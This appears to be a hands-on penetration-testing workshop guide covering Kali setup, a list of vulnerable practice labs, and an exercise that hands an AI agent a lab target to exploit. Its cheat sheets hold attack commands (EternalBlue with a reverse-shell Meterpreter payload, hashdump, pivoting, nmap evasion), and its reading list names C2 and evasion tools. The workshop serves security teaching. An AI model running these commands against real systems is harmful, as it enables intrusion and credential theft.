A hands-on introduction to penetration testing using Metasploit Framework.
- USB drive (minimum 16/32, 64GB+ recommended)
- Computer with boot from USB capability
- Basic Linux command line knowledge
- VirtualBox or VMware for some exercises
This workshop consists of four parts: environment setup, NMAP practice, practical exploitation exercises, and AI-assisted penetration testing evaluation.
Choose the appropriate guide for your operating system:
-
macOS: https://www.kali.org/docs/usb/live-usb-install-with-mac/
- Use Balena Etcher instead of
ddfor simplicity - Skip USB encryption for this workshop
- Use Balena Etcher instead of
-
Windows: https://www.kali.org/docs/usb/live-usb-install-with-windows/
- Verify all Rufus options match the guide exactly
Before starting:
- Read the entire installation guide first
- Verify all options in Rufus/Etcher match the guide exactly
- After installation, boot into Kali and familiarize yourself with the interface
Common Issues:
- Secure Boot may need to be disabled in BIOS
- Some machines require legacy boot mode for USB booting
Take 10-15 minutes to practice NMAP commands from the lecture.
Save your outputs with -oA practice_scan for later reference. Full command reference is in the presentation slides and quick reference at the end of this document.
Work through the labs you like (organized by difficulty). If you have Hack The Box experience, start with easy labs to understand MSF workflow, then jump to advanced challenges (~8).
1. Pentest Pivot Example (Simplest - 3 machines, clear tutorial)
- Repository: https://github.com/Charlie-belmer/pentest-pivot-example
- Perfect starting point with comprehensive walkthrough
2. Franc205 Pivoting Lab (10 containers, progressive walkthrough)
- Repository: https://github.com/franc205/pivoting-lab
- Structured progression through pivoting concepts
3. Cimihan123 Docker Pivot Lab (2-network basic setup)
- Repository: https://github.com/Cimihan123/Docker-Pivot-Lab
- Simple multi-network environment
4. Oliver Wiegers Pentest Lab (Multiple services, monitoring stack)
- Repository: https://github.com/oliverwiegers/pentest_lab
- Real-world service configurations
5. HackInOS:1 (WordPress → Docker containers)
- Download: https://www.vulnhub.com/entry/hackinos-1,295/
- Web application to container pivoting
6. Metasploitable 3 (2 VMs, manual network config required)
- Repository: https://github.com/rapid7/metasploitable3
- Official Rapid7 vulnerable environment
- There is also metasploitable2, metasploitable1
7. myHouse7 (1 VM + 7 containers, 20 flags)
- Download: https://www.vulnhub.com/entry/myhouse7-1,286/
- CTF-style with multiple objectives
8. WinterMute (OSCP-level, port knocking, exploitation chain)
- Download: https://www.vulnhub.com/entry/wintermute-1,239/
- Complex multi-stage exploitation
9. Capsulecorp Pentest (5-VM AD domain, MS17-010, multiple servers)
- Repository: https://github.com/R3dy/capsulecorp-pentest
- Active Directory pivoting practice
10. WaddleCorp Pentest (6-VM AD domain, PrintNightmare)
- Repository: https://github.com/NetPenguins/pentest-lab
- Modern AD vulnerabilities
11. SecGen (Framework - generates random vulnerable VMs)
- Repository: https://github.com/cliffe/SecGen
- Procedurally generated challenges
After completing exercises manually, evaluate AI tools' capabilities in solving the same challenges.
Download any MCP server that can execute terminal commands (e.g., Claude Code). Most modern AI coding assistants have this capability.
- Choose a lab you've already solved
- Provide the AI with the target information
- Ask it to solve the exercise in one shot
- Evaluate its approach and success rate
- Can it identify vulnerabilities correctly?
- Does it use appropriate MSF modules?
- Can it handle pivoting and lateral movement?
- How well does it adapt to unexpected responses?
# Start Metasploit console
msfconsole
# Update Metasploit database
msfdb init
msfupdate
# Search for modules
search <keyword>
search type:exploit platform:windows
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
# Show module information
info
show options
show payloads
show targets# Set required options
set RHOSTS <target_ip>
set LHOST <your_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
# Check if target is vulnerable
check
# Run the exploit
exploit
run# Meterpreter commands
sysinfo
getuid
hashdump
ps
migrate <PID>
# Pivoting
run autoroute -s <subnet>
use auxiliary/scanner/portscan/tcp
set RHOSTS <pivoted_subnet>
run# Background current session
background
Ctrl+Z
# List sessions
sessions -l
# Interact with session
sessions -i <session_id>
# Kill session
sessions -k <session_id>Internal Network: VMs can only communicate with each other Set it in VM settings -> Network -> Attached to: Internal Network. Don't expose your vulnerable labs to the internet!
# Reinitialize database
msfdb reinit
# Check database status
msfdb status
# Manual fix
systemctl start postgresql
msfconsole -q
db_status# Check network interfaces
ip addr show
ifconfig
# Test connectivity
ping <target_ip>
nmap -sn <target_subnet>
# Enable IP forwarding for pivoting
echo 1 > /proc/sys/net/ipv4/ip_forwardMSF and VMs can be resource-intensive:
- Allocate at least 2GB RAM per VM
- Use
free -hto monitor memory - Close unnecessary modules with
backcommand - Restart msfconsole if it becomes sluggish
# Host discovery
nmap -sn 192.168.1.0/24
# Common scans
nmap -sS 192.168.1.1 # SYN scan (stealth)
nmap -sT 192.168.1.1 # TCP connect
nmap -sV 192.168.1.1 # Version detection
nmap -sC 192.168.1.1 # Default scripts
nmap -A 192.168.1.1 # Aggressive scan
# Port specification
nmap -p 22,80,443 192.168.1.1 # Specific ports
nmap -p- 192.168.1.1 # All ports
nmap -F 192.168.1.1 # Fast (top 100)
nmap --top-ports 1000 192.168.1.1
# Timing
nmap -T0 192.168.1.1 # Paranoid
nmap -T4 192.168.1.1 # Aggressive
# Output
nmap -oA scan_name 192.168.1.1 # All formats
# Evasion
nmap -D RND:10 192.168.1.1 # Decoys
nmap -f 192.168.1.1 # Fragment packets# Core workflow
search <term>
use <module>
show options
set RHOSTS <ip>
set LHOST <ip>
exploit
# Session handling
sessions -l
sessions -i <id>
background
# Meterpreter basics
sysinfo
getuid
hashdump
getsystem
migrate <PID>Essential commands for navigating the VM and following the exercises:
# Print current directory
pwd
# List files in current directory
ls
# List with details (size, permissions, dates)
ls -la
# Change directory
cd path/to/directory
# Go to home directory
cd ~
cd $HOME
# Go up one directory
cd ..
# Go to previous directory
cd -# Create directory
mkdir directory_name
# Remove file
rm filename
# Remove directory and contents
rm -rf directory_name
# Copy file
cp source.txt destination.txt
# Move/rename file
mv oldname.txt newname.txt
# View file contents
cat file.txt
# View file with paging
less file.txt
# (press 'q' to quit)
# Edit file
vim file.txt
nano file.txt# List running processes
ps aux
# Find specific process
ps aux | grep process_name
# Kill process by PID
kill <PID>
# Kill process by name
pkill process_name
# Stop running command
Ctrl+C# Check disk space
df -h
# Check memory usage
free -h
# Check CPU/memory usage (live)
top
# (press 'q' to quit)
# Download file from URL
wget https://example.com/file.tar.gz
# Extract tar.gz archive
tar -xvzf file.tar.gz# Set variable for current session
export CC=afl-cc
export CXX=afl-c++
# View variable
echo $CC
echo $HOME
# View all environment variables
env# Make script executable
chmod +x script.sh
# Run executable
./script.sh
# Run with sudo (root privileges)
sudo commandEducational Purpose: This workshop teaches security testing techniques for authorized environments only. Use these skills exclusively on systems you own or have explicit written permission to test.
Legal Responsibility: You are solely responsible for your actions. The instructor and organizers accept no responsibility for:
- Unauthorized access to systems
- Data loss or system damage
- Legal consequences of misuse
- Any malicious use of techniques learned
Ethical Guidelines:
- Never test systems without explicit authorization
- Report vulnerabilities responsibly
- Respect privacy and confidentiality
- Use knowledge to improve security, not exploit it
By participating, you acknowledge understanding these terms and agree to use this knowledge ethically and legally.
- Armitage Manual - GUI for Metasploit with visual attack workflows and collaboration features. Try to find out if there is anything similar, free, and opensourced (this is a project idea).
- Metasploit Custom Modules Development - Look for a section on creating your own exploits and auxiliary modules
- Metasploit Pro Features - Advanced features like social engineering campaigns and web app testing (try to see what modern software is capable of)
- Sliver C2 - Cross-platform implant framework with WireGuard, mTLS, compile-time obfuscation
- Havoc Framework - Sleep obfuscation via Ekko/Foliage, indirect syscalls, AMSI/ETW patching
- Covenant - .NET collaborative C2 with Roslyn dynamic compilation for Windows environments
- Mythic - Multi-user C2 platform with pluggable agents and custom payload development
- DEF CON AI Village - AI-assisted penetration testing and automated vulnerability discovery
- PentestGPT Paper - LLM-powered automated penetration testing framework (USENIX Security '24)
- Automated Penetration Testing: Formalization - Self-organizing architecture for automated pentesting
- PentestAgent with LLM - RAG-enhanced LLM agents for pentesting
- PenHeal: Two-Stage LLM Framework - Automated pentesting and remediation
- HackSynth - LLM agent evaluation framework for autonomous pentesting
- AutoPT: End2End Automated Web Pentesting - PSM-driven automated web pentesting
- Donut - Position-independent shellcode for .NET assemblies and unmanaged PE files
- BloodHound - Graph-based Active Directory attack path discovery
- Impacket - Python library for network protocols and AD attacks
- Rubeus - Kerberos abuse toolkit for ticket manipulation
- OffSec PEN-300 (OSEP) - Advanced evasion, process injection, AD exploitation chains, better than PEN200
- Atomic Red Team - MITRE ATT&CK validation framework for testing your techniques
Author: Sasha Zyuzin
Good luck!